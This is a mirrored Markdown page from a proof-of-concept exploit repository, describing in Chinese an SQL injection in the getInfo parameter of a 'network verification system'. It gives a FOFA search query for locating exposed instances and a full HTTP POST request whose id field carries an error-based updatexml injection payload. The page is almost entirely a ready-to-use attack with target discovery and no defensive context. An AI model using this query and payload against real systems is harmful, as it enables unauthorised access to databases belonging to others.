mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
24 lines
614 B
Markdown
24 lines
614 B
Markdown
## 网络验证系统getInfo参数存在SQL注入漏洞
|
|
|
|
|
|
## fofa
|
|
```
|
|
body="zhuya/js/base.js"
|
|
```
|
|
|
|

|
|
|
|
## poc
|
|
```
|
|
POST /index.php/api/Software/getInfo HTTP/1.1
|
|
Host:
|
|
Content-Length: 0
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
|
|
|
data=123456&id=1 and updatexml(1,concat(0x7e,md5(123),0x7e),1)
|
|
```
|
|
|
|
|
|

|